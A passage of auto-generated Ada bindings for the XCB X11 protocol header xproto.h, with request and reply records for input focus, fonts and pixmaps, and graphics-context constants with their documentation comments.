/usr/include/xcb/xproto.h:2555 --* Opcode for xcb_translate_coordinates. --* -- * @brief xcb_translate_coordinates_request_t -- * type xcb_translate_coordinates_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2566 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2567 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2568 src_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2569 dst_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2570 src_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2571 src_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2572 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2565 --* -- * @brief xcb_translate_coordinates_reply_t -- * type xcb_translate_coordinates_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2579 same_screen : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2580 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2581 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2582 child : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2583 dst_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2584 dst_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2585 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2578 --* Opcode for xcb_warp_pointer. --* -- * @brief xcb_warp_pointer_request_t -- * type xcb_warp_pointer_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2595 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2596 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2597 src_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2598 dst_window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2599 src_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2600 src_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2601 src_width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2602 src_height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2603 dst_x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2604 dst_y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2605 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2594 type xcb_input_focus_t is (XCB_INPUT_FOCUS_NONE, XCB_INPUT_FOCUS_POINTER_ROOT, XCB_INPUT_FOCUS_PARENT, XCB_INPUT_FOCUS_FOLLOW_KEYBOARD) with Convention => C; -- /usr/include/xcb/xproto.h:2608 --*< The focus reverts to `XCB_NONE`, so no window will have the input focus. --*< The focus reverts to `XCB_POINTER_ROOT` respectively. When the focus reverts, --FocusIn and FocusOut events are generated, but the last-focus-change time is --not changed. --*< The focus reverts to the parent (or closest viewable ancestor) and the new --revert_to value is `XCB_INPUT_FOCUS_NONE`. --*< NOT YET DOCUMENTED. Only relevant for the xinput extension. --* Opcode for xcb_set_input_focus. --* -- * @brief xcb_set_input_focus_request_t -- * type xcb_set_input_focus_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2633 revert_to : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2634 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2635 focus : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2636 time : aliased xcb_timestamp_t; -- /usr/include/xcb/xproto.h:2637 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2632 --* -- * @brief xcb_get_input_focus_cookie_t -- * type xcb_get_input_focus_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2644 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2643 --* Opcode for xcb_get_input_focus. --* -- * @brief xcb_get_input_focus_request_t -- * type xcb_get_input_focus_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2654 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2655 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2656 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2653 --* -- * @brief xcb_get_input_focus_reply_t -- * type xcb_get_input_focus_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2663 revert_to : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2664 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2665 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2666 focus : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:2667 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2662 --* -- * @brief xcb_query_keymap_cookie_t -- * type xcb_query_keymap_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2674 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2673 --* Opcode for xcb_query_keymap. --* -- * @brief xcb_query_keymap_request_t -- * type xcb_query_keymap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2684 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2685 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2686 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2683 --* -- * @brief xcb_query_keymap_reply_t -- * type xcb_query_keymap_reply_t_array2340 is array (0 .. 31) of aliased bits_stdint_uintn_h.uint8_t; type xcb_query_keymap_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2693 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2694 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2695 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2696 keys : aliased xcb_query_keymap_reply_t_array2340; -- /usr/include/xcb/xproto.h:2697 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2692 --* Opcode for xcb_open_font. --* -- * @brief xcb_open_font_request_t -- * type xcb_open_font_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_open_font_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2707 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2708 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2709 fid : aliased xcb_font_t; -- /usr/include/xcb/xproto.h:2710 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2711 pad1 : aliased xcb_open_font_request_t_array1823; -- /usr/include/xcb/xproto.h:2712 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2706 --* Opcode for xcb_close_font. --* -- * @brief xcb_close_font_request_t -- * type xcb_close_font_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2722 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2723 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2724 font : aliased xcb_font_t; -- /usr/include/xcb/xproto.h:2725 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2721 type xcb_font_draw_t is (XCB_FONT_DRAW_LEFT_TO_RIGHT, XCB_FONT_DRAW_RIGHT_TO_LEFT) with Convention => C; -- /usr/include/xcb/xproto.h:2728 --* -- * @brief xcb_fontprop_t -- * type xcb_fontprop_t is record name : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:2737 value : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2738 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2736 --* -- * @brief xcb_fontprop_iterator_t -- * type xcb_fontprop_iterator_t is record data : access xcb_fontprop_t; -- /usr/include/xcb/xproto.h:2745 c_rem : aliased int; -- /usr/include/xcb/xproto.h:2746 index : aliased int; -- /usr/include/xcb/xproto.h:2747 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2744 --* -- * @brief xcb_charinfo_t -- * type xcb_charinfo_t is record left_side_bearing : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2754 right_side_bearing : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2755 character_width : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2756 ascent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2757 descent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2758 attributes : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2759 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2753 --* -- * @brief xcb_charinfo_iterator_t -- * type xcb_charinfo_iterator_t is record data : access xcb_charinfo_t; -- /usr/include/xcb/xproto.h:2766 c_rem : aliased int; -- /usr/include/xcb/xproto.h:2767 index : aliased int; -- /usr/include/xcb/xproto.h:2768 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2765 --* -- * @brief xcb_query_font_cookie_t -- * type xcb_query_font_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2775 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2774 --* Opcode for xcb_query_font. --* -- * @brief xcb_query_font_request_t -- * type xcb_query_font_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2785 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2786 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2787 font : aliased xcb_fontable_t; -- /usr/include/xcb/xproto.h:2788 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2784 --* -- * @brief xcb_query_font_reply_t -- * type xcb_query_font_reply_t_array1791 is array (0 .. 3) of aliased bits_stdint_uintn_h.uint8_t; type xcb_query_font_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2795 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2796 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2797 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2798 min_bounds : aliased xcb_charinfo_t; -- /usr/include/xcb/xproto.h:2799 pad1 : aliased xcb_query_font_reply_t_array1791; -- /usr/include/xcb/xproto.h:2800 max_bounds : aliased xcb_charinfo_t; -- /usr/include/xcb/xproto.h:2801 pad2 : aliased xcb_query_font_reply_t_array1791; -- /usr/include/xcb/xproto.h:2802 min_char_or_byte2 : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2803 max_char_or_byte2 : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2804 default_char : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2805 properties_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2806 draw_direction : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2807 min_byte1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2808 max_byte1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2809 all_chars_exist : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2810 font_ascent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2811 font_descent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2812 char_infos_len : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2813 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2794 --* -- * @brief xcb_query_text_extents_cookie_t -- * type xcb_query_text_extents_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2820 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2819 --* Opcode for xcb_query_text_extents. --* -- * @brief xcb_query_text_extents_request_t -- * type xcb_query_text_extents_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2830 odd_length : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2831 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2832 font : aliased xcb_fontable_t; -- /usr/include/xcb/xproto.h:2833 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2829 --* -- * @brief xcb_query_text_extents_reply_t -- * type xcb_query_text_extents_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2840 draw_direction : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2841 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2842 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2843 font_ascent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2844 font_descent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2845 overall_ascent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2846 overall_descent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2847 overall_width : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:2848 overall_left : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:2849 overall_right : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:2850 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2839 --* -- * @brief xcb_str_t -- * type xcb_str_t is record name_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2857 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2856 --* -- * @brief xcb_str_iterator_t -- * type xcb_str_iterator_t is record data : access xcb_str_t; -- /usr/include/xcb/xproto.h:2864 c_rem : aliased int; -- /usr/include/xcb/xproto.h:2865 index : aliased int; -- /usr/include/xcb/xproto.h:2866 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2863 --* -- * @brief xcb_list_fonts_cookie_t -- * type xcb_list_fonts_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2873 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2872 --* Opcode for xcb_list_fonts. --* -- * @brief xcb_list_fonts_request_t -- * type xcb_list_fonts_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2883 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2884 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2885 max_names : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2886 pattern_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2887 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2882 --* -- * @brief xcb_list_fonts_reply_t -- * type xcb_list_fonts_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_list_fonts_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2894 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2895 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2896 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2897 names_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2898 pad1 : aliased xcb_list_fonts_reply_t_array2015; -- /usr/include/xcb/xproto.h:2899 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2893 --* -- * @brief xcb_list_fonts_with_info_cookie_t -- * type xcb_list_fonts_with_info_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2906 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2905 --* Opcode for xcb_list_fonts_with_info. --* -- * @brief xcb_list_fonts_with_info_request_t -- * type xcb_list_fonts_with_info_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2916 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2917 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2918 max_names : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2919 pattern_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2920 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2915 --* -- * @brief xcb_list_fonts_with_info_reply_t -- * type xcb_list_fonts_with_info_reply_t_array1791 is array (0 .. 3) of aliased bits_stdint_uintn_h.uint8_t; type xcb_list_fonts_with_info_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2927 name_len : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2928 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2929 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2930 min_bounds : aliased xcb_charinfo_t; -- /usr/include/xcb/xproto.h:2931 pad0 : aliased xcb_list_fonts_with_info_reply_t_array1791; -- /usr/include/xcb/xproto.h:2932 max_bounds : aliased xcb_charinfo_t; -- /usr/include/xcb/xproto.h:2933 pad1 : aliased xcb_list_fonts_with_info_reply_t_array1791; -- /usr/include/xcb/xproto.h:2934 min_char_or_byte2 : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2935 max_char_or_byte2 : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2936 default_char : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2937 properties_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2938 draw_direction : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2939 min_byte1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2940 max_byte1 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2941 all_chars_exist : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2942 font_ascent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2943 font_descent : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:2944 replies_hint : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2945 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2926 --* Opcode for xcb_set_font_path. --* -- * @brief xcb_set_font_path_request_t -- * type xcb_set_font_path_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_set_font_path_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2955 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2956 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2957 font_qty : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2958 pad1 : aliased xcb_set_font_path_request_t_array1823; -- /usr/include/xcb/xproto.h:2959 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2954 --* -- * @brief xcb_get_font_path_cookie_t -- * type xcb_get_font_path_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:2966 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2965 --* Opcode for xcb_get_font_path. --* -- * @brief xcb_get_font_path_request_t -- * type xcb_get_font_path_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2976 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2977 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2978 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2975 --* -- * @brief xcb_get_font_path_reply_t -- * type xcb_get_font_path_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_font_path_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2985 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:2986 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2987 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:2988 path_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:2989 pad1 : aliased xcb_get_font_path_reply_t_array2015; -- /usr/include/xcb/xproto.h:2990 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2984 --* Opcode for xcb_create_pixmap. --* -- * @brief xcb_create_pixmap_request_t -- * type xcb_create_pixmap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3000 depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3001 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3002 pid : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3003 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:3004 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3005 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3006 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:2999 --* Opcode for xcb_free_pixmap. --* -- * @brief xcb_free_pixmap_request_t -- * type xcb_free_pixmap_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3016 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:3017 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:3018 pixmap : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:3019 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:3015 subtype xcb_gc_t is unsigned; XCB_GC_FUNCTION : constant unsigned := 1; XCB_GC_PLANE_MASK : constant unsigned := 2; XCB_GC_FOREGROUND : constant unsigned := 4; XCB_GC_BACKGROUND : constant unsigned := 8; XCB_GC_LINE_WIDTH : constant unsigned := 16; XCB_GC_LINE_STYLE : constant unsigned := 32; XCB_GC_CAP_STYLE : constant unsigned := 64; XCB_GC_JOIN_STYLE : constant unsigned := 128; XCB_GC_FILL_STYLE : constant unsigned := 256; XCB_GC_FILL_RULE : constant unsigned := 512; XCB_GC_TILE : constant unsigned := 1024; XCB_GC_STIPPLE : constant unsigned := 2048; XCB_GC_TILE_STIPPLE_ORIGIN_X : constant unsigned := 4096; XCB_GC_TILE_STIPPLE_ORIGIN_Y : constant unsigned := 8192; XCB_GC_FONT : constant unsigned := 16384; XCB_GC_SUBWINDOW_MODE : constant unsigned := 32768; XCB_GC_GRAPHICS_EXPOSURES : constant unsigned := 65536; XCB_GC_CLIP_ORIGIN_X : constant unsigned := 131072; XCB_GC_CLIP_ORIGIN_Y : constant unsigned := 262144; XCB_GC_CLIP_MASK : constant unsigned := 524288; XCB_GC_DASH_OFFSET : constant unsigned := 1048576; XCB_GC_DASH_LIST : constant unsigned := 2097152; XCB_GC_ARC_MODE : constant unsigned := 4194304; -- /usr/include/xcb/xproto.h:3022 --*< TODO: Refer to GX --*< In graphics operations, given a source and destination pixel, the result is --computed bitwise on corresponding bits of the pixels; that is, a Boolean --operation is performed in each bit plane. The plane-mask restricts the --operation to a subset of planes, so the result is: -- ((src FUNC dst) AND plane-mask) OR (dst AND (NOT plane-mask)) --*< Foreground colorpixel. --*< Background colorpixel. --*< The line-width is measured in pixels and can be greater than or equal to one, a wide line, or the --special value zero, a thin line. --*< The line-style defines which sections of a line are drawn: --Solid The full path of the line is drawn. --DoubleDash The full path of the line is drawn, but the even dashes are filled differently -- than the odd dashes (see fill-style), with Butt cap-style used where even and -- odd dashes meet. --OnOffDash Only the even dashes are drawn, and cap-style applies to all internal ends of -- the individual dashes (except NotLast is treated as Butt). --*< The cap-style defines how the endpoints of a path are drawn: --NotLast The result is equivalent to Butt, except that for a line-width of zero the final -- endpoint is not drawn. --Butt The result is square at the endpoint (perpendicular to the slope of the line) -- with no projection beyond. --Round The result is a circular arc with its diameter equal to the line-width, centered -- on the endpoint; it is equivalent to Butt for line-width zero. --Projecting The result is square at the end, but the path continues beyond the endpoint for -- a distance equal to half the line-width; it is equivalent to Butt for line-width -- zero. --*< The join-style defines how corners are drawn for wide lines: --Miter The outer edges of the two lines extend to meet at an angle. However, if the -- angle is less than 11 degrees, a Bevel join-style is used instead. --Round The result is a circular arc with a diameter equal to the line-width, centered -- on the joinpoint. --Bevel The result is Butt endpoint styles, and then the triangular notch is filled. --*< The fill-style defines the contents of the source for line, text, and fill requests. For all text and fill --requests (for example, PolyText8, PolyText16, PolyFillRectangle, FillPoly, and PolyFillArc) --as well as for line requests with line-style Solid, (for example, PolyLine, PolySegment, --PolyRectangle, PolyArc) and for the even dashes for line requests with line-style OnOffDash --or DoubleDash: --Solid Foreground --Tiled Tile --OpaqueStippled A tile with the same width and height as stipple but with background -- everywhere stipple has a zero and with foreground everywhere stipple -- has a one --Stippled Foreground masked by stipple --For the odd dashes for line requests with line-style DoubleDash: --Solid Background --Tiled Same as for even dashes --OpaqueStippled Same as for even dashes --Stippled Background masked by stipple --*< --*< The tile/stipple represents an infinite two-dimensional plane with the tile/stipple replicated in all --dimensions. When that plane is superimposed on the drawable for use in a graphics operation, --the upper-left corner of some instance of the tile/stipple is at the coordinates within the drawable --specified by the tile/stipple origin. The tile/stipple and clip origins are interpreted relative to the --origin of whatever destination drawable is specified in a graphics request. --The tile pixmap must have the same root and depth as the gcontext (or a Match error results). --The stipple pixmap must have depth one and must have the same root as the gcontext (or a --Match error results). For fill-style Stippled (but not fill-style --OpaqueStippled), the stipple pattern is tiled in a single plane and acts as an --additional clip mask to be ANDed with the clip-mask. --Any size pixmap can be used for tiling or stippling, although some sizes may be faster to use than --others. --*< The tile/stipple represents an infinite two-dimensional plane with the tile/stipple replicated in all --dimensions. When that plane is superimposed on the drawable for use in a graphics operation, --the upper-left corner of some instance of the tile/stipple is at the coordinates within the drawable --specified by the tile/stipple origin. The tile/stipple and clip origins are interpreted relative to the --origin of whatever destination drawable is specified in a graphics request. --The tile pixmap must have the same root and depth as the gcontext (or a Match error results). --The stipple pixmap must have depth one and must have the same root as the gcontext (or a --Match error results). For fill-style Stippled (but not fill-style --OpaqueStippled), the stipple pattern is tiled in a single plane and acts as an --additional clip mask to be ANDed with the clip-mask. --Any size pixmap can be used for tiling or stippling, although some sizes may be faster to use than --others. --*< TODO --*< TODO --*< Which font to use for the `ImageText8` and `ImageText16` requests. --*< For ClipByChildren, both source and destination windows are additionally --clipped by all viewable InputOutput children. For IncludeInferiors, neither --source nor destination window is --clipped by inferiors. This will result in including subwindow contents in the source and drawing --through subwindow boundaries of the destination. The use of IncludeInferiors with a source or --destination window of one depth with mapped inferiors of differing depth is not illegal, but the --semantics is undefined by the core protocol. --*< Whether ExposureEvents should be generated (1) or not (0). --The default is 1. --*< TODO --*< TODO --*< The clip-mask restricts writes to the destination drawable. Only pixels where the clip-mask has --bits set to 1 are drawn. Pixels are not drawn outside the area covered by the clip-mask or where --the clip-mask has bits set to 0. The clip-mask affects all graphics requests, but it does not clip --sources. The clip-mask origin is interpreted relative to the origin of whatever destination drawable is specified in a graphics request. If a pixmap is specified as the clip-mask, it must have --depth 1 and have the same root as the gcontext (or a Match error results). If clip-mask is None, --then pixels are always drawn, regardless of the clip origin. The clip-mask can also be set with the --SetClipRectangles request. --*< TODO --*< TODO --*< TODO type xcb_gx_t is (XCB_GX_CLEAR, XCB_GX_AND, XCB_GX_AND_REVERSE, XCB_GX_COPY, XCB_GX_AND_INVERTED, XCB_GX_NOOP, XCB_GX_XOR, 